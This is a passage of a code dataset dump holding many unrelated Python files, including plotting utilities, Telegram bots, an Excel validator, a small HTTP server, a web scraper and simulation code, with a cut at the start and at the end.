kwargs.get('components', 'images')\n batches, scan_indices, ns_slice, components = [\n iterize(arg) for arg in (batches, scan_indices, ns_slice, components)\n ]\n clims = kwargs.get('clims', (-1200, 300))\n clims = clims if isinstance(clims[0], (tuple, list)) else (clims,)\n\n # lengthen args\n n_boxes = max(len(arg) for arg in (batches, scan_indices, ns_slice, clims))\n\n def lengthen(arg):\n return arg if len(arg) == n_boxes else arg * n_boxes\n\n batches, scan_indices, ns_slice, clims, components = [\n lengthen(arg)\n for arg in (batches, scan_indices, ns_slice, clims, components)\n ]\n\n # plot slices\n _, axes = plt.subplots(1, n_boxes, squeeze=False, figsize=(10, 4 * n_boxes))\n\n zipped = zip(\n range(n_boxes), batches, scan_indices, ns_slice, clims, components)\n\n for i, batch, scan_index, n_slice, clim, component in zipped:\n slc = batch.get(scan_index, component)[n_slice]\n axes[0][i].imshow(slc, cmap=plt.cm.gray, clim=clim)\n axes[0][i].set_xlabel('Shape: {}'.format(slc.shape[1]), fontdict=font)\n axes[0][i].set_ylabel('Shape: {}'.format(slc.shape[0]), fontdict=font)\n title = 'Scan' if component == 'images' else 'Mask'\n axes[0][i].set_title(\n '{} #{}, slice #{} \\n \\n'.format(title, scan_index, n_slice),\n fontdict=font_caption)\n axes[0][i].text(\n 0.2,\n -0.25,\n 'Total slices: {}'.format(len(batch.get(scan_index, component))),\n fontdict=font_caption,\n transform=axes[0][i].transAxes)\n\n # set inverse-spacing grid\n if grid:\n inv_spacing = 1 / batch.get(scan_index, 'spacing').reshape(-1)[1:]\n step_mult = 50\n xticks = np.arange(0, slc.shape[0], step_mult * inv_spacing[0])\n yticks = np.arange(0, slc.shape[1], step_mult * inv_spacing[1])\n axes[0][i].set_xticks(xticks, minor=True)\n axes[0][i].set_yticks(yticks, minor=True)\n axes[0][i].set_xticks([], minor=False)\n axes[0][i].set_yticks([], minor=False)\n\n axes[0][i].grid(color='r', linewidth=1.5, alpha=0.5, which='minor')\n\n plt.show()\n\n\ndef discrete_cmap(N, base_cmap=None):\n \"\"\"Create an N-bin discrete colormap from the specified input map\"\"\"\n base = plt.cm.get_cmap(base_cmap)\n color_list = base(np.linspace(0, 1, N))\n cmap_name = base.name + str(N)\n return base.from_list(cmap_name, color_list, N)\n\n\ndef colorbar(mappable, ticks, labels=None):\n mappable.set_clim(-0.5, len(ticks) - 0.5)\n ax = mappable.axes\n fig = ax.figure\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n cbar = fig.colorbar(mappable, cax=cax, ticks=ticks)\n if labels is not None: cbar.ax.set_yticklabels(labels)\n return cbar","sub_path":"sentinel/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":6234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"61675983","text":"# -*- coding:utf-8 -*-\nimport os\nfrom urllib.parse import urlsplit\n\nimport click\n\nfrom bank_merge import inputs, outputs\n\n\nclass BankInputFile(click.Path):\n \"\"\"\n Click type for handling bank input file arguments and delegating\n parsing of such files to selected handler based on file extension.\n\n Expected input is a local file path.\n \"\"\"\n\n PARSERS = {\n '.csv': inputs.CSVFile,\n }\n\n def __init__(self, *, row_parser, **kwargs):\n self.row_parser = row_parser\n kwargs.setdefault('exists', True)\n\n super().__init__(**kwargs)\n\n def convert(self, value, param, ctx):\n path = super().convert(value, param, ctx)\n\n _, ext = os.path.splitext(path)\n if ext not in self.PARSERS:\n allowed_extensions = ','.join(self.PARSERS.keys())\n self.fail(\n f'input extension {ext} is not supported, allowed extensions: {allowed_extensions}',\n param,\n ctx,\n )\n\n return self.PARSERS[ext](path=path, row_parser=self.row_parser)\n\n\nclass BankOutput(click.ParamType):\n \"\"\"\n Click type for handling output argument.\n\n Expected input is a local file path or destination URI, ex:\n\n - output.csv\n - /home/me/output.csv\n - /home/me/output.csv\n - file:///home/me/output.csv\n - postgresql://aaa:bbb@localhost/test\n \"\"\"\n name = 'URI'\n\n # for local files, use extension to select proper handler\n EXTENSIONS = {\n '.csv': outputs.CSVFile,\n }\n\n # for non-file URIs, use scheme to select a handler\n SCHEMES = {\n # 'postgresql': outputs.PsqlDB,\n }\n\n def convert(self, value, param, ctx):\n parts = urlsplit(value)\n\n if not parts.scheme or parts.scheme == 'file':\n parsed_value = os.path.normpath(os.path.join(\n parts.netloc,\n parts.path.lstrip('/') if parts.netloc else parts.path\n ))\n\n _, ext = os.path.splitext(parsed_value)\n if ext not in self.EXTENSIONS:\n allowed_extensions = ','.join(self.EXTENSIONS.keys())\n self.fail(\n f'output extension {ext} is not supported, allowed extensions: {allowed_extensions}',\n param,\n ctx,\n )\n\n destination_cls = self.EXTENSIONS[ext]\n else:\n parsed_value = value\n\n if parts.scheme not in self.SCHEMES:\n allowed_schemes = ','.join(self.SCHEMES.keys())\n self.fail(\n f'output scheme {parts.scheme} is not supported, allowed schemes: {allowed_schemes}',\n param,\n ctx,\n )\n\n destination_cls = self.SCHEMES[parts.scheme]\n\n return destination_cls(parsed_value)\n","sub_path":"bank_merge/cli_types.py","file_name":"cli_types.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"320104594","text":"#\n# 1157_단어공부.py\n# BaekjoonAlgorithm\n#\n# Created by EonseokYim on 6/9/19, 4:09 PM.\n# Copyright © 2019 EonseokYim. All rights reserved.\n#\n# https://www.acmicpc.net/problem/1157\n#\n\"\"\"\n 'A' = 65\n 'a' = 97\n\n .count('x')\n 리스트 타입에서 사용하는 메서드\n 리스트 안에서 'x'가 몇개있는지 개수를 int 타입으로 리턴해주는 메서드\n 사용하면 코드를 간결하게 할 수 있음.\n\"\"\"\n\ncharacters = list(input())\n\nalphabet = []\nfor i in range(26):\n alphabet.append( characters.count(chr(65+i)) + characters.count(chr(97+i)) )\n\nif alphabet.count(max(alphabet)) == 1:\n print(max(alphabet))\nelse:\n print('?')\n\n","sub_path":"일반/1157_단어공부.py","file_name":"1157_단어공부.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"328827207","text":"__author__ = 'sei'\n\nimport cv2\nimport numpy as np\nfrom scipy import linalg\nfrom matplotlib import pyplot as plt\n\nimg_rgb = cv2.imread('1.jpg',1)\n#img_rgb = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2RGB)\n#img2 = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)\ntemplate = cv2.imread('1_template.jpg',1)\n#template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)\nw, h, d = template.shape\nW, H, D = img_rgb.shape\n\n# All the 6 methods for comparison in a list\n#methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',\n# 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']\n\nmethods = ['cv2.TM_CCOEFF_NORMED']\n\ndef __residual(params, img, x, y):\n a, b, c = params\n return a*x+b*y+c-img[x,y,0]\n\nfor meth in methods:\n method = eval(meth)\n img = img_rgb.copy()\n #img = cv2.pyrMeanShiftFiltering(img, 10, 10)\n img = cv2.GaussianBlur(img,(9,9),0)\n #img = cv2.bilateralFilter(img,5,105,105)\n\n img = cv2.cvtColor(img, cv2.COLOR_HSV2BGR_FULL)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2YUV)\n channels = cv2.split(img)\n channels[0] = cv2.equalizeHist(channels[0])\n img = cv2.merge(channels)\n img = cv2.cvtColor(img, cv2.COLOR_YUV2BGR)\n\n\n res = cv2.matchTemplate(img, template, method)\n\n thresh = res.copy()\n thresh = cv2.convertScaleAbs(thresh)\n thresh = cv2.equalizeHist(thresh)\n thresh = cv2.GaussianBlur(thresh,(3,3),0)\n ret, thresh = cv2.threshold(thresh,100, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n res = (255-res)\n\n threshold = 0.8\n loc = np.where( res >= threshold)\n for pt in zip(*loc[::-1]):\n cv2.circle(img, (pt[0]+w/2, pt[1]+h/2), 4, 255, 1)\n\n cv2.namedWindow('image', cv2.WINDOW_NORMAL)\n cv2.imshow('image',img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"491313024","text":"import matplotlib.pyplot as plt\nfrom tensorboard.backend.event_processing import event_accumulator\nimport glob\nimport re\nimport numpy as np\nimport os\n\nimport pandas as pd\n\ndef scrape_file(file: str, pattern: str, one_per_line: bool = True,\n data_type=float):\n data = []\n with open(file, \"r\") as ff:\n lines = ff.readlines()\n for line in lines:\n matches = re.findall(pattern, line)\n if len(matches) <= 0:\n continue\n\n if one_per_line:\n matches = [matches[0]]\n data += [data_type(m) for m in matches]\n return data\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description='Plot pattern from regex.')\n parser.add_argument('files', metavar='N', type=str, nargs='+',\n help='list of files to scrape')\n\n args = parser.parse_args()\n data_files = []\n\n for f, name in zip(args.files[1::2], args.files[0::2]):\n data_files.append((f, name))\n assert os.path.isfile(f), f\"{f} is not a file.\"\n\n pattern = '\\(\\'rel_pos\\', ([^)]*)'\n\n rolling_len = 15\n\n fig, ax = plt.subplots()\n\n for i, (f, name) in enumerate(data_files):\n d = scrape_file(f, pattern)\n\n steps = np.arange(len(d))\n value = pd.Series(np.array(d) / 10)\n\n win = value.rolling(rolling_len)\n mu = win.mean()\n sigma = win.std()\n\n base_line, = ax.plot(steps, mu, label=f\"{name}\")\n # ax.fill_between(steps, mu + sigma, mu - sigma,\n # facecolor=base_line.get_color(), alpha=0.5)\n\n ax.legend(loc=\"upper right\")\n plt.title('1 step relative pose (rolling window 15)')\n plt.show()\n\n\n\n\n\n","sub_path":"plot_from_text.py","file_name":"plot_from_text.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"503403640","text":"import json\nimport requests\nimport config\nimport time\n\n\nBOT_URL = 'https://api.telegram.org/bot{}/'.format(config.BOT_TOKEN)\nLANG_URL = 'https://translate.yandex.net/api/v1.5/tr.json/detect'\nTRANSLATE_URL = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\n\n\ndef get_source_language(text):\n params = dict(\n key=config.TRANSLATE_TOKEN,\n text=text,\n hint='en,ru'\n )\n resp = requests.get(url=LANG_URL, params=params)\n data = json.loads(resp.text)\n return data['lang']\n\n\ndef get_translation(text):\n src = get_source_language(text)\n direct = 'en-ru'\n\n if src != 'en':\n direct = 'ru-en'\n\n params = dict(\n key=config.TRANSLATE_TOKEN,\n text=text,\n lang=direct\n )\n resp = requests.get(url=TRANSLATE_URL, params=params)\n data = json.loads(resp.text)\n return data['text'][0]\n\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode('utf8')\n return content\n\n\ndef get_json_from_url(url):\n content = get_url(url)\n js = json.loads(content)\n return js\n\n\ndef get_updates(offset=None):\n url = BOT_URL + 'getUpdates?timeout=100'\n if offset:\n url += '&offset={}'.format(offset)\n js = get_json_from_url(url)\n return js\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates['result'])\n last_update = num_updates - 1\n text = updates['result'][last_update]['message']['text']\n chat_id = updates['result'][last_update]['message']['chat']['id']\n return text, chat_id\n\n\ndef send_message(text, chat_id):\n url = BOT_URL + \"sendMessage?text={}&chat_id={}\".format(get_translation(text), chat_id)\n get_url(url)\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates['result']:\n update_ids.append(int(update['update_id']))\n return max(update_ids)\n\n\ndef resp_all(updates):\n for update in updates['result']:\n try:\n text = update['message']['text']\n chat = update['message']['chat']['id']\n send_message(text, chat)\n except Exception as e:\n print(e)\n\n\ndef main():\n last_update_id = None\n while True:\n updates = get_updates(last_update_id)\n if len(updates) > 0:\n last_update_id = get_last_update_id(updates) + 1\n resp_all(updates)\n time.sleep(0.5)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"translate_script.py","file_name":"translate_script.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"131440953","text":"from cross_over import *\r\n\r\n####################################\r\n# modify variables here\r\ncrossover_num = 100\r\nfirstgen_num = 100\r\np = 0.2\r\n####################################\r\n\r\nfor i in range(crossover_num):\r\n num_list = range(1, firstgen_num+1)\r\n file_choice = random.sample(num_list, 2)\r\n file1 = \"data/\"+folder+\"/class_randassign\"+str(file_choice[0])+\".csv\"\r\n file2 = \"data/\"+folder+\"/class_randassign\"+str(file_choice[1])+\".csv\"\r\n class_df1 = pd.read_csv(file1)\r\n class_df1 = pd.read_csv(file2)\r\n\r\n main(p, classroom_df, class_df1, class_df2)\r\n class_df1.to_csv(\"data/\"+folder+\"/crossover\"+str(i+1)+\".csv\", index=False, index_col=False)\r\n","sub_path":"second_gen.py","file_name":"second_gen.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"131268431","text":"# 39. Write a program to calculate the area of n number of circle where\n# radius of circle is input by user.\n\npi = 3.14\ni = int(input(\"Enter how many circles you wish program to calculate.\\n\"))\nj = 1\n\nwhile j <= i:\n print(\"\\nEnter radius of circle {}\".format(j))\n r = int(input(\"\"))\n a = 2 * pi * r\n print(\"Area of circle {} is {}\".format(j, a))\n j += 1\n\n\n\n\n\n\n\n","sub_path":"py_practice/Problem39.py","file_name":"Problem39.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"70917643","text":"# -*- coding:utf-8 -*-\n\nimport re\nfrom socket import *\nfrom threading import Thread\n\ndocumentRoot = './html'\nbind_addr = ('', 7788)\n\n\ndef handle(newsocket, clientaddr):\n # while True:\n print('---1---')\n recv_data = newsocket.recv(4096)\n print('---2---')\n print(recv_data)\n if recv_data:\n recv_data = recv_data.decode('utf-8').splitlines()\n result = re.split(r' ', recv_data[0])\n if result[1] == '/':\n print('---3---')\n file_name = documentRoot + '/' + 'index.html'\n print(file_name)\n else:\n print('---4---')\n filename = re.search(r'^/(.+\\b)', result[1])\n file_name = documentRoot + '/' + filename.group(1)\n print(file_name)\n try:\n f = open(file_name, 'r')\n except Exception as result:\n print(result)\n responseheaderlines = \"HTTP/1.1 404 not found\\r\\n\"\n responseheaderlines += \"\\r\\n\"\n responsebody = \"====sorry ,file not found====\"\n print('---5---')\n else:\n responseheaderlines = \"HTTP/1.1 200 OK\\r\\n\"\n responseheaderlines += \"\\r\\n\"\n responsebody = f.read()\n f.close()\n finally:\n print('---6---')\n responsebody = responseheaderlines + responsebody\n newsocket.send(responsebody.encode('utf-8'))\n print('---7---')\n newsocket.close()\n # break\n\n\ndef main():\n s = socket(AF_INET, SOCK_STREAM)\n s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n s.bind(bind_addr)\n s.listen(10)\n try:\n while True:\n newsocket, clientaddr = s.accept()\n t1 = Thread(target=handle, args=(newsocket, clientaddr))\n t1.start()\n finally:\n s.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"HTTP服务器/003-web服务器-3-多线程.py","file_name":"003-web服务器-3-多线程.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"19002575","text":"\nimport xlrd\nfrom openpyxl import load_workbook\nimport sys\nimport os\n#from datetime import datetime\nimport io\n#import numpy as np\nfrom PyQt5.QtWidgets import (QApplication,QFileDialog, QTextEdit, QComboBox, QVBoxLayout,QWidget, QPlainTextEdit,QPushButton, QDesktopWidget,QGridLayout, QLabel, QLineEdit,QRadioButton)\nfrom PyQt5.QtGui import QIcon,QColor\nfrom PyQt5.QtCore import QCoreApplication\nimport Validation\n\n#excelPath = 'D:/minwoo/Working_Directory/03_이대엽_크로마틴 구조기반 간암 유방암 예후예측 3D-nucleome 바이오마커 발굴_20190710.xlsx'\n\n\n\nexcelPath = \"\"\n'''\ninput value = excel File\n'''\nclass KonaValidation(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n def center(self): #창을 가운데 띄우기위한 함수\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def searchExcelFileButtonClicked(self,path,errbox):\n fname = QFileDialog.getOpenFileName(self)\n path.setText(fname[0])\n errbox.clear()\n\n\n def initUI(self):\n\n self.resize(1000,600)\n self.center()\n self.setWindowTitle(\"Kona Validation Program\")\n excelPathInput = QLineEdit(self)\n excelFileSearch = QPushButton(\"엑셀 파일 찾기\",self)\n validation = QPushButton('Validation Start',self)\n errorBox = QTextEdit(self)\n\n grid = QGridLayout()\n self.setLayout(grid)\n grid.addWidget(QLabel('엑셀 파일:'),1,0)\n grid.addWidget(excelPathInput,1,1)\n grid.addWidget(excelFileSearch,1,2)\n grid.addWidget(validation,2,1)\n grid.addWidget(errorBox,3,1)\n excelFileSearch.clicked.connect(lambda: self.searchExcelFileButtonClicked(excelPathInput,errorBox))\n validation.clicked.connect(lambda: self.run(str(excelPathInput.text()),errorBox))\n self.show()\n\n\n\n\n #bioSample_SampleName = []\n #experiment_SampleName = []\n\n def run(self,excelPathInputValue,errbox):\n try:\n\n targetExcel = load_workbook(excelPathInputValue,data_only=True) # 엑셀 연다.\n\n bioProjectSheetName = ''\n bioSampleSheetName = []\n sampleTypeSheetName = []\n experimentSheetName = []\n\n sheets = targetExcel.sheetnames\n #시트 이름들을 가져와서 포함되는 단어에 따라서 각각의 배열에 추가\n for sheet in sheets:\n if 'BioProject' in str(sheet):\n bioProjectSheetName += str(sheet)\n elif 'BioSample' in str(sheet):\n bioSampleSheetName.append(str(sheet))\n elif 'Sample type' in str(sheet):\n sampleTypeSheetName.append(str(sheet))\n elif 'Experiment' in str(sheet):\n experimentSheetName.append(str(sheet))\n\n\n #biosample,sampletype,experiment 쌍의 개수만큼 반복한다.\n rotation = len(bioSampleSheetName)\n\n bioProject = targetExcel[bioProjectSheetName]\n Validation.bioProject_Validation(bioProject,bioProjectSheetName,errbox) #BioProject는 1개뿐이므로 그냥 validation 실행\n\n #나머지 시트들은 존재하는 개수만큼 실행한다.\n #bioSample_SampleName = []\n\n i = 0\n while i < rotation:\n bioSample = targetExcel[bioSampleSheetName[i]]\n sampleType = targetExcel[sampleTypeSheetName[i]]\n experiment = targetExcel[experimentSheetName[i]]\n\n Validation.bioSample_Validation(bioSample,sampleType,bioSampleSheetName[i],errbox)\n bioSample_SampleName = Validation.sampleType_Validation(sampleType,sampleTypeSheetName[i],errbox)\n Validation.Experiment_Validation(experiment,experimentSheetName[i],errbox, bioSample_SampleName)\n i += 1\n\n except IOError as err:\n errbox.insertPlainText(\"IO Error : \" + str(err))\n\n\n\n\nif __name__ == '__main__':\n\n app = QApplication(sys.argv) #어플리케이션 객체 생성\n ex = KonaValidation()\n #ex.show()\n sys.exit(app.exec_())\n","sub_path":"KONA_Validation/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"380897452","text":"'''\nCreated on 9 May 2016\n\n@author: quangv\n'''\nfrom src.utility.placement import PlacementGenerator \nfrom src.utility.radii import RadiiGenerator \nimport json, math\nimport random\nfrom math import hypot\nfrom src import constants\n\nclass AdaptiveContextGenerator(object):\n \n def __init__(self, parameters):\n\n self.parameters = parameters\n self.radii_generators = []\n self.placement_generators = []\n self.total_population_num = 0\n \n def _generateContext(self,current_pedestrian_position,group_num, start_area):\n \n self.total_population_num = 0\n for num in group_num:\n self.total_population_num+=num\n \n \n radii = self.parameters['radius_mean'] *2+0.05\n grid_cell_size = radii #multiple 2 because there needs diameter \n #grid = self._generate_placement_area(self.parameters['start_areas'], grid_cell_size)\n grid = self._generate_placement_area(start_area, grid_cell_size)\n \n cells = []\n while len(cells) != self.total_population_num: \n cells = random.sample(grid, self.total_population_num) \n \n #check overlap\n index_overlapped = []\n for index_cell in range(len(cells)):\n current_cell = cells[index_cell] \n for pedestrian_position in current_pedestrian_position:\n if hypot(current_cell[0] -pedestrian_position[0], current_cell[1] - pedestrian_position[1]) < radii*2:\n index_overlapped.append(index_cell)\n \n #remove overlap \n index_overlapped = list(set(index_overlapped))\n for value in index_overlapped:\n while value in cells: cells.remove(value)\n \n for group in group_num:\n num = group\n \n radii_generator = RadiiGenerator(self.parameters,num)\n radii_generator._generate_radii()\n group_cell = random.sample(cells, num)\n cells = constants.remove_subset(cells,group_cell)\n \n position_generator = PlacementGenerator(self.parameters,num) \n position_generator._generate_placements(group_cell,grid_cell_size,radii_generator._get_radii_for_group())\n \n self.radii_generators.append(dict(\n radii_group = radii_generator._get_radii_for_group(),\n max_radii = radii_generator._get_max_radii()))\n \n self.placement_generators.append(dict( \n position_group = position_generator._get_placements_for_group()))\n \n def _generate_placement_area(self, start_areas,cell_size):\n grid = list()\n (x1,y1,x2,y2) = start_areas\n t = self.parameters['targets'][0]\n x_range = x2-x1\n y_range = y2-y1\n x_offset = (x_range % cell_size)/2\n y_offset = (y_range % cell_size)/2\n cells_x = int(math.floor(x_range / cell_size))\n cells_y = int(math.floor(y_range / cell_size))\n \n for i in range(cells_x):\n for j in range(cells_y):\n grid.append((i * cell_size + x_offset + x1, \n j * cell_size + y_offset + y1,t))\n return grid\n \n \n def _get_radii_generators(self):\n return self.radii_generators\n \n def _get_placement_generators(self):\n return self.placement_generators \n \n def _set_radii_generators(self,radii_generators):\n self.radii_generators = radii_generators\n \n def _set_placement_generators(self, placement_generators):\n self.placement_generators = placement_generators \n \nclass AdaptiveContextLog_Encoder(json.JSONEncoder):\n def default(self, obj):\n if not isinstance(obj, AdaptiveContextGenerator):\n return super(AdaptiveContextLog_Encoder, self).default(obj)\n return obj.__dict__\n\nclass AdaptiveContextLog_Decoder(json.JSONDecoder):\n def decode(self,json_string):\n \n default_obj = super(AdaptiveContextLog_Decoder,self).decode(json_string)\n \n parameters = default_obj['parameters']\n \n radii_generators = []\n placement_generators = []\n \n str_radii_generators = default_obj['radii_generators'] \n for radius in str_radii_generators:\n radii_generators.append(dict(radii_group = radius['radii_group'],\n max_radii = radius['max_radii']))\n \n str_placement_generators = default_obj['placement_generators'] \n for placement_generator in str_placement_generators:\n placement_generators.append(dict(position_group = placement_generator['position_group']))\n\n \n context_generator = AdaptiveContextGenerator(parameters)\n context_generator._set_radii_generators(radii_generators)\n context_generator._set_placement_generators(placement_generators)\n \n return context_generator ","sub_path":"3_Crowd Simulations/T_intersection_corridor/cm-simulation-grouping/src/utility/adaptive_context.py","file_name":"adaptive_context.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"620303119","text":"import telebot\nimport config\nimport pars_val\n\nbot = telebot.TeleBot(config.token)\n\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n markup = telebot.types.InlineKeyboardMarkup()\n markup.add(telebot.types.InlineKeyboardButton(text='Доллар США', callback_data=1))\n markup.add(telebot.types.InlineKeyboardButton(text='Евро', callback_data=2))\n markup.add(telebot.types.InlineKeyboardButton(text='Фунт Стерлингов', callback_data=3))\n markup.add(telebot.types.InlineKeyboardButton(text='Китайский Юань', callback_data=4))\n markup.add(telebot.types.InlineKeyboardButton(text='Швейцарский Франк', callback_data=5))\n markup.add(telebot.types.InlineKeyboardButton(text='Турецкая Лира', callback_data=6))\n markup.add(telebot.types.InlineKeyboardButton(text='Японская Йена', callback_data=7))\n bot.send_message(message.chat.id, text=\"Выберите валюту, по которой хотите узнать курс\", reply_markup=markup)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef query_handler(call):\n\n bot.answer_callback_query(callback_query_id=call.id, text='Спасибо за выбор бота')\n answer = ''\n if call.data == '1':\n answer = 'Доллар США ' + pars_val.dollar + ' за одну условную единицу в рублях'\n elif call.data == '2':\n answer = 'Евро ' + pars_val.euro + ' за одну условную единицу в рублях'\n elif call.data == '3':\n answer = 'Фунт Стерлингов ' + pars_val.funt + ' за одну условную единицу в рублях'\n elif call.data == '4':\n answer = 'Китайский Юань ' + pars_val.kit + ' за одну условную единицу в рублях'\n elif call.data == '5':\n answer = 'Швейцарский франк ' + pars_val.frank + ' за одну условную единицу в рублях'\n elif call.data == '6':\n answer = 'Турецкая лира ' + pars_val.lira + ' за одну условную единицу в рублях'\n elif call.data == '7':\n answer = 'Японская йена ' + pars_val.yena + ' за одну условную единицу в рублях'\n\n bot.send_message(call.message.chat.id, answer)\n bot.edit_message_reply_markup(call.message.chat.id, call.message.message_id)\n\nbot.infinity_polling()\n\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"319503736","text":"import random\nimport time\n\nimport gevent\nimport requests\nfrom lxml import etree\n\n\"\"\"爬取图片\"\"\"\nHEADERS = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15'\n}\n\n\ndef get_img():\n url = 'http://sc.chinaz.com/tupian/meinvtupian.html'\n _url = 'http://sc.chinaz.com/tupian/meinvtupian_%d.html'\n\n for i in range(1, 10):\n if i == 1:\n page_text = requests.get(url, headers=HEADERS).text\n else:\n page_text = requests.get(_url % i, headers=HEADERS).text\n tree = etree.HTML(page_text)\n\n data_list = tree.xpath('//div[@id=\"container\"]/div')\n for data in data_list:\n src = data.xpath('./div/a/img/@src2')[0]\n title = data.xpath('./div/a/img/@alt')[0].encode('iso-8859-1').decode('utf8')\n img = requests.get(src, headers=HEADERS).content\n with open(f'./imgs/{title}.jpg', 'wb') as f:\n f.write(img)\n\n\ndef get_cv(page):\n if page == 1:\n url = 'http://sc.chinaz.com/jianli/free.html'\n else:\n url = f'http://sc.chinaz.com/jianli/free_{page}.html'\n page_text = requests.get(url, headers=HEADERS).text\n tree = etree.HTML(page_text)\n div_list = tree.xpath('//div[@id=\"container\"]/div')\n for div in div_list:\n href = div.xpath('./a/@href')[0]\n title = div.xpath('./a/img/@alt')[0].encode('iso-8859-1').decode('utf8')\n\n ppt_text = requests.get(href, headers=HEADERS).text\n tree = etree.HTML(ppt_text)\n li_list = tree.xpath('//div[@id=\"down\"]/div[2]/ul/li/a/@href')\n rank = random.randint(0, len(li_list) - 1)\n ppt_url = li_list[rank]\n print(ppt_url, rank, page)\n ppt = requests.get(ppt_url, headers=HEADERS).content\n gevent.spawn(write, title, ppt)\n\n\ndef write(title, ppt):\n with open(f'./cvs/{title}{time.time()}.rar', 'wb') as f:\n f.write(ppt)\n\n\nif __name__ == '__main__':\n start = time.time()\n g_l = []\n for i in range(1, 500):\n g = gevent.spawn(get_cv, i)\n g_l.append(g)\n gevent.joinall(g_l)\n print(time.time() - start)\n","sub_path":"103 爬虫2/hw.py","file_name":"hw.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"7090750","text":"from SimComponents import PacketGenerator, PacketSink, SwitchPort, PortMonitor, Packet\nimport simpy\nfrom functools import partial\nimport logging\nfrom numpy.random import RandomState\nlogger = logging.getLogger(__name__)\n\nclass Network(object):\n def __init__(self):\n self.nodes = {}\n self.links = {}\n\n def get_reward(self):\n total = 0\n for link in self.links:\n pass\n\n def add_link(self, link):\n self.links[link.id] = link\n\n def add_node(self, node):\n self.nodes[node.id] = node\n\nclass RoutingAlgorithm(object):\n def __init__(self, node, gen):\n self.node = node\n self.gen = gen\n\n def route_packet(self, packet):\n for port in self.node.output_ports:\n if port == packet.dst:\n return port\n return self.gen.choice(list(self.node.output_ports.keys()))\n\nclass Link(object):\n def __init__(self, env, id, cost, src, dst, switch_port):\n self.env = env\n self.id = id\n self.cost = cost\n self.src = src\n self.dst = dst\n self.up = True\n self.switch_port = switch_port\n\n def send(self, packet):\n yield self.env.timeout(self.cost)\n self.dst.put(packet)\n\n def put(self, packet):\n self.env.process(self.send(packet))\n\n def __setstate__(self, state):\n self.up = state\n\n # Function for returning different capacity parameters\n def get_capacity(self, option):\n if option == 0:\n return self.switch_port.qlimit\n if option == 1:\n return self.switch_port.size_packet\n if option == 2:\n return self.switch_port.qlimit - self.switch_port.size_packet\n\n def total_cost(self):\n return self.switch_port.size_packet * (self.cost + self.switch_port.rate)\n\nclass Node(object):\n\n def __init__(self, id, env, gen):\n self.env = env\n self.id = id\n self.packet_generator = None\n self.output_ports = {}\n self.port_monitors = {}\n self.routes = {}\n self.routing_algo = None\n self.env.process(self.run())\n self.packet_sink = PacketSink(env=self.env, rec_arrivals=True, id=\"{}_ps\".format(self.id))\n self.gen = gen\n\n self.incoming_packets = simpy.Store(self.env, capacity=1)\n self.packets_received = 0\n self.packets_sent = 0\n\n def set_routing_algo(self):\n # put this router into the controller controller.setNode(self.id)\n self.routing_algo = RoutingAlgorithm(gen=self.gen, node=self)\n\n def set_packet_generator(self, lbd, possible_destinations):\n\n def dstdist(gen, possible_destinations):\n if possible_destinations is None:\n return None\n else:\n return gen.choice(possible_destinations)\n\n def 